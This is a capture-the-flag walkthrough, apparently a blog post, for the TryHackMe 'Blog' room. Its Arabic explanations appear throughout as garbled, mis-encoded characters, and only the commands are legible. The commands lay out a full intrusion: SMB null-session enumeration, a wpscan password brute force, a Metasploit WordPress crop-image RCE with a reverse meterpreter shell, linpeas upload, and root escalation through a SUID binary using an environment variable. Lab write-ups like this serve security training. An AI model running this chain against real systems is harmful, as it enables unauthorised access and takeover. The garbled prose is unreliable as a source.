ุจุณู
ุงููู ุงููู ูุจุบู ูุดูู ุงูุญู ู
ุดุฑูุญ ููุฏูู ูุฑุฌุน ููููุฏูู ุนูู ููุงุชู ุจุงูููุชููุจ ุนูู ูุฐุง ุงูุฑุงุจุท:
VIDEO
ุฑุงุจุท ุงูุชุญุฏู: https://tryhackme.com/r/room/blog
====================================================
ููู
ุฉ IP ูู ูู ุงูููู
ุงูุฏุฒ ุงููู ุฃูุชุจูุง ุชُุณุชุจุฏู ุจุงููIP ููู
ุดูู ุญูุชูู
ุนูู TryHackMe
ุฃูู ุญุงุฌุฉ ูุดุบู ุงููmachine ููุชุฃูุฏ ุฅููุง ุงุชุตููุง ุจุดุจูุฉ TryHackMe ูุงูุงุชุตุงู ู
ุถุจูุท، ุจุนุฏูู ูุจุฏุฃ ุจุฃูู ุฎุทูุฉ ููุญู ููู ุฅููุง ูุณูู scan ููุดุจูุฉ ุจุงุณุชุฎุฏุงู
nmap
sudo nmap IP -vv
ุทูุน ู
ุนุงูุง 4 ุจูุฑุชุงุช، ูุฑุฌุน ูุณูู Aggressive ุณูุงู ุนูููุง
sudo nmap IP -vv -A -p 22,80,139,445
ุนูู ุจูุฑุช 22 ุนูุฏูุง SSH ููุธุงู
ุงูุชุดุบูู ูุฌูุงุฒ ุงูุถุญูุฉ ูู Ubuntu، ูุนูู ุจูุฑุช 80 ุนูุฏูุง Apache server، ุฃู
ุง ุจูุฑุช 139 ู 445 ู
ุชุนููุฉ ุจุงููsmb. ุจุฑุถู ุฃุนุทุงูุง ูู ุงููุชุงุฆุฌ ุฅู ุงููhttp generator ูู WordPress ูุจุฑุถู ุฃุนุทุงูุง ุฑูู
ุงููุณุฎุฉ ููู 5.0، ููุฐู ู
ุนููู
ุฉ ู
ููุฏุฉ ูู
ูู
ุฉ.
ุฅุฐุง ุฒุฑูุง ุงูุตูุญุฉ ุนูู ุจูุฑุช 80 ูู ุงูู
ุชุตูุญ، ุจููุงูู ุจููู ููู
ุณุชุฎุฏู
Billy ููููุง ุจูุณุชุงุช، ูููู ู
ุง ุจุฏุงุฎู ูุฐู ุงูุจูุณุชุงุช ุดูุก ู
ูู
.
ู ุฒู ู
ุง ูุงู ููุง ูู ุงูุชุญุฏู، ุจูุถูู ุงูู
ููุน ุฅูู ู
ูู etc/hosts/ ุนูู ุงูุฌูุงุฒ
ุงูุญูู ุจูุณุชููุฏ ู
ู ุงููsmb ุนูู ุฌูุงุฒ ุงูุถุญูุฉ ููุญุงูู ูุฌู
ุน ู
ุนููู
ุงุช ุจุงุณุชุฎุฏุงู
enum4linux -a IP
ุฃุนุทุงูู ุฅู ุงููnull sessions ู
ุณู
ูุญุฉ
ูุฃูุถุง ุนูุฏู ู
ุณุชุฎุฏู
ูู ุนูู ุงููุธุงู
ุงุณู
ูู
bjoel ูุงูุซุงูู smb
ูุจุฑุถู ุนูุฏู ุซูุงุซุฉ shares
print ู IPC ูู ุงูุชุฑุงุถูุฉ ูุฏุงุฆู
ุง ู
ูุฌูุฏุฉ، ูู
ุง ุจูุดูู ุนูููุง، ุจูุดูู ููุท ุนูู BillySMB. ูุจู
ุง ุฅู ุงููnull sessions ู
ุณู
ูุญุฉ ูููุฏุฑ ูุฏุฎู ุนููู ุจุงุณุชุฎุฏุงู
smbclient
smbclient //IP/billySMB
ูุฅุฐุง ุนุฑุถูุง ุงูู
ูุฌูุฏ ุจูููู 3 ู
ููุงุช، ูุญู
ููุง ูููุง ุนูู ุฌูุงุฒูุง
get Alice-While-Rabbit.jpg
get tswift.mp4
get check-this.png
ุจุนุฏูู ูุดูู ุนูู ูุฐู ุงูู
ููุงุช، ุงูู
ูู ุงููุญูุฏ ุงููู ุจูููู ููู ู
ุนููู
ุฉ ูู Alice-While-Rabbit.jpg ูุนุดุงู ูุณุชุฎุฑุฌ ุงูู
ูู ูุณุชุฎุฏู
steghide extract -sf Alice-White-Rabbit.jpg
ุฅุฐุง ุทูุจ ููู
ุฉ ุงูุณุฑ ูุถุบุท enter، ุซู
ุจูุชุญู
ู ู
ุนุงูุง ู
ูู ุงุณู
ู rabbit_hole ูุจุฏุงุฎูู ูุฐู ุงูุฑุณุงูุฉ
:) ูุฐูู ุจูุชููู ููุง، ูููุชูู ูููweb
ูุณูู directory enumeration ุจุงุณุชุฎุฏุงู
gobuster
gobuster dir -w /usr/share/dirb/wordlists/common.txt -u htttp://IP/ -t 64
ุทูุน ู
ุนุงูุง ู
ุฌู
ูุนุฉ ูุจูุฑุฉ ู
ู ุตูุญุงุช wordpress، ูู
ุง ูู ุตูุญุฉ ู
ُููุชุฉ، ูุจูุชุฌุงูุฒ ูุฐู ุงูุฎุทูุฉ.
ุจู
ุง ุฅููุง ุนุฑููุง ุฅู ุฌูุงุฒ ุงูุถุญูุฉ ูุดุชุบู ุนููู wordpress، ูุจูุณุชุฎุฏู
ุงูุฃุฏุงุฉ wpscan ูุฌู
ุน ุงูู
ุนููู
ุงุช
wpscan --url http://blog.thm/ -e u,vp,vt
ู
ุง ุจูุทูุน ู
ุนุงูุง ุดูุก ุจุงููุณุจุฉ ููู vulnerable plugins and themes ููู ุจูุนุทููู ุงูุณูุงู ุงุณู
ูู ูู
ุณุชุฎุฏู
ูู ุนูู ุงูู
ููุน ููู
bjoel ู kwheel.
ูุฑุฌุน ูุณุชุฎุฏู
wpscan ุนุดุงู ูุจุญุซ ุนู ููู
ุฉ ุงูุณุฑ. ุฃูู ุดูุก ุจูุญูุธ ุฃุณู
ุงุก ุงูู
ุณุชุฎุฏู
ูู ูู ู
ูู، ูู ูุงุญุฏ ูู ุณุทุฑ ููุญุฏู، ูุจุณู
ูู users. ุซู
ูุดุบู ูุฐู ุงูููู
ุงูุฏ:
wpscan --url http://blog.thm/ -U users -P /usr/share/wordlists/rockyou.txt -t64
ูุจูุทูุน ู
ุนุงูุง ููู
ุฉ ุงูุณุฑ ููkwheel، ุงูุญูู ูุจุญุซ ุฅุฐุง ูุงู ููู ุฃู exploit ููุฐู ุงููุณุฎุฉ ู
ู WordPress
searchsploit wordpress 5.0
ุจูุจุญุซ ุนู ุงููmetasploit exploit ูู ูููู ูุจุชุทูุน ู
ุนุงูุง ูุฐู ุงูุตูุญุฉ ، ุงููู ุชุญุชูู ุนูู ุงุณู
ุงููmodule ูู
ุนููู
ุงุช ุนููุง، ูุงูุด ูุญุชุงุฌ ูุญุท options
ูุฑุฌุน ูุฌูุงุฒูุง ููุดุบู metasploit ุซู
ูุจุญุซ ุนู ุงููmodule ููุดุบููุง
msfconsole -q
use cp_crop_rce
set rhosts IP
set lhost tun0
tun0 ูู ุนููุงู ุงููopenVPN
set username kwheel
set password ******
run
ุจูุญุตู ุนูู meterpreter
shell
ุนูุดุงู ูุญุตู ุนูู shell ูู ุงููุธุงู
/bin/bash -i
python3 -c 'import pty; pty.spawn("/bin/bash")'
ุจุนุฏูู ูุฑูุญ ูููhome ููุดูู ูุด ุฏุงุฎูู ู
ููุงุช، ุจูููู user.txt، ูููู ู
ุง ูู ุงูููุงู ุงููู ูุจุบุงู، ูู
ุง ุนูุฏูุง ุญู ุซุงูู ุบูุฑ ุฅููุง ูุฑูุน ุตูุงุญูุงุชูุง ููroot.
ูู
ู
ูู ูุจุญุซ ุจููุณูุง ุนู ุทُุฑู ูุณุชุบููุง ูุฑูุน ุงูุตูุงุญูุงุช، ุฃู ู
ู
ูู ูุณุชุฎุฏู
ุณูุฑูุจุช ูุณูู ุนูููุง ุงูู
ูุถูุน، ู
ุซู linpeas.sh، ูุนุดุงู ููููู ููุถุญูุฉ ุฃูู ุดูุก ุจูุฑุฌุน ูููmeterpreter ูุถุบุท ุนูู ctrl + z ุซู
ูุฑูุญ ูููtmp ููุญู
ู ุงูู
ูู ููุงู
ุทูุจ ููู ุงุฎุชุฑุช ุงููtmp ؟؟
ุฃูู ุญุงุฌุฉ tmp ูู ู
ูู ูู ุงูู
ููุงุช ุงููู ููู ุชُู
ุณุญ ุชููุงุฆูุง ุนูุฏ ุฅุบูุงู ุงูุฌูุงุฒ، ูู
ุซูุง ูู ููุช ุชุดุชุบู ูู ุฌูุงุฒ ุงูุถุญูุฉ ููุฌุฃุฉ ุชููู، ุนูุทูู ุจููู
ุณุญ ุฃู ุดูุก ุญู
ูุชู ููุงู ุนูู tmp ููุตูุฑ ู
ุง ูุจูู ูู ุฃุซุฑ.
ุซุงูู ุญุงุฌุฉ، ูู
ุง ูุดุชุบู ุนูู ุฌูุงุฒ ุฃูุถู ุฅููุง ูุฌุนู ู
ููุงุชูุง ู
ุญููุธุฉ ูู ู
ูุงู ูุงุญุฏ، ูุณูููุฉ ุงููุตูู ููุง ููุณูููุฉ ู
ุณุญูุง ูุงูุชุฎูุต ู
ููุง، ููุง ุณูุงู
ูู ูุงู ูุฐุง ุงูู
ูุงู ูู ู
ู ููุณู ูู
ุณุญ ุงููู ููู ูู ุชู
ุฅุบูุงู ุงูุฌูุงุฒ ุจุดูู ู
ูุงุฌุฆ.
cd /tmp
upload linpea.sh ูู ูุฐู ุงูููู
ุงูุฏ ุญุทู ุงูู
ุณุงุฑ ูุงู
ู ูู linpeas.sh ุฅุฐุง ู
ุง ููุชู ู
ุดุบููู metasploit ู
ู ููุณ ุงูู
ุฌูุฏ ุงููู ููู ุงูุณูุฑูุจุช.
ุงูุญูู ุชุญู
ู ุงูู
ูู، ูุฑุฌุน ูููshell ููุบูุฑ ุตูุงุญูุงุช ุงูุณูุฑูุจุช ุนุดุงู ูุดุบูู
channel -i 1
cd /tmp
chmod +x linpeas.sh
./linpeas.sh
ูู ุงููุชุงุฆุฌ ุทูุน ู
ุนุงูุง SUID ุงุณู
ู checker، ููุฐุง ุงุณู
ุฌุฏูุฏ ูุจุงูุนุงุฏุฉ ู
ู ู
ูุฌูุฏ.
ูู ุดุบููุงู ุจูุทุจุน ููุง ุงูุฑุณุงูุฉ Not an Amin
ููู ุฌุฑุจูุง ูุณูููุง strings، ู
ุง ุจูููู
ูููุณ ุงููbinary ูุฐูู ุจุฃูููู ูุฌูุงุฒู ูุฃุฏุฑุณู ุจุงุณุชุฎุฏุงู
ghidra
ูุฎุฑุฌ ู
ู ุงููshell ุจุงุณุชุฎุฏุงู
ctrl + z
ุซู
download /usr/sbin/checker
ุซู
ูุดุบู ghidra ุนูู ุฌูุงุฒูุง، ู
ู ูุงุฆู
ุฉ file ูุฎุชุงุฑ New project ุซู
ูุถุบุท Next ุซู
ูุฎุชุงุฑ ุงูู
ุฌูุฏ ุงููู ูุจู ูุญูุธ ููู، ุงุฎุชุงุฑูุง ุฃู ู
ุฌูุฏ ุชุจุบูู. ุซู
ูุนุทู ุงููproject ุงุณู
، ุจุฑุถู ุญุทู ุฃู ุงุณู
ุชุจุบูู، ุขุฎุฑ ุดูุก ูุถุบุท finish.
ุจูุฑุฌุนูุง ูุฃูู ุตูุญุฉ، ูุฑุฌุน ู
ู ูุงุฆู
ุฉ file ููุฎุชุงุฑ import file، ุซู
ูุฎุชุงุฑ ุงูู
ูู ุงููู ุชู ุญู
ููุงู ูุงููู ูู checker ุซู
ุจูุทูุน ููุง ูุฐู ุงููุงูุฐุฉ
ูุฎูู ูู ุดูุก ุฒู ู
ุง ูู ููุถุบุท ok
ุจุนุฏ ูุฐุง ุจูุฑุฌุน ุจุฑุถู ุนูู ุฃูู ุตูุญุฉ، ูุถุบุท ุนูู ุงูุชููู ุงูุฃุฎุถุฑ ูุจููุชุญ ู
ุนุงู ูุงูุฐุฉ ูุจูุฑุฉ، ู
ู ูุงุฆู
ุฉ file، ูุฎุชุงุฑ open، ุซู
ูุฑูุญ ููู
ูู checker ูููุชุญู، ุจูุทูุน ููุง ูุงูุฐุฉ ูุฎุชุงุฑ yes، ุซู
ุจููุชุญ ูุงูุฐุฉ analysis options ูุญุท ุตุญ ุนูุฏ Decompiler Parameter ID، ุซู
ูุถุบุท Analyze.
ุจูุทูุน ููุง ุจุนุฏ ุชุญููู ุงูุจุงููุงุฑู ูุฐุง ุงูููุฏ ุจูุบุฉ c
ุงูููุฏ ุจุงุฎุชุตุงุฑ ูุงุฎุฐ ููู
ุฉ ุงููenvironment variable ุงููู ุงุณู
ู admin ููุดูู ูู ูุงู ููู ููู
ุฉ، ุฃู ููู
ุฉ ุจูุฎูู ุงููuser id ูุณุงูู 0 ูุงููู ูู ูุนูู root، ุซู
ุจูุนุทููู shell، ุฃู
ุง ูู ุญุงูุฉ ูุงู ู
ุง ูููadmin ููู
ุฉ ุจูุทุจุน ููุง ุฑุณุงูุฉ Not an admin. ูุงููู ูุญุชุงุฌ ูุณููู ุจูู ุณูููุฉ ุงูุขู ุฅููุง ูุนَุฑِّู ู
ุชุบูุฑ ุงุณู
ู admin ููุฎุฒู ููู ุฃู ููู
ุฉ، ูุจุนุฏูู ูุดุบู ุงูุจุงููุงุฑู، ูุนูุทูู ุจูุญุตู ุนูู root shell.
ูุฑุฌุน ุงูุญูู ุนูู ุงูุถุญูุฉ ููุดุบู ุงููshell
shell
export admin=1
checker
ูุนูุทูู ุจูุญุตู ุนูู root shell
ูุณูู spawn ูู bash
/bin/bash -i
ุซู
ูุจุญุซ ุนู ุงูููุงูุงุช
ุงูู root.txt ู
ูุฌูุฏ ุนูู ุงููroot home directory
cd /root
cat root.txt
ูุจูุฐุง ุญุตููุง ุนูู ุงูููุงู ✨، ุจุงููููุง ูุงุญุฏ ุซุงูู، ููุจุญุซ ุนูู
find / -name "user.txt" -type f
ูุจูุทูุน ููู ู
ุญููุธ
cat /media/usb/user.txt
ูุจูุฐุง ูููู ุญุตููุง ุนูู ุงูููุงู ุงูุขุฎุฑ ูุงูุชูููุง ู
ู ุงูุญู ✨.
ููุง ุญู ุงูุฃุณุฆูุฉ ุจุงุณุชุซูุงุก ุงูููุงูุงุช:
Comments
Post a Comment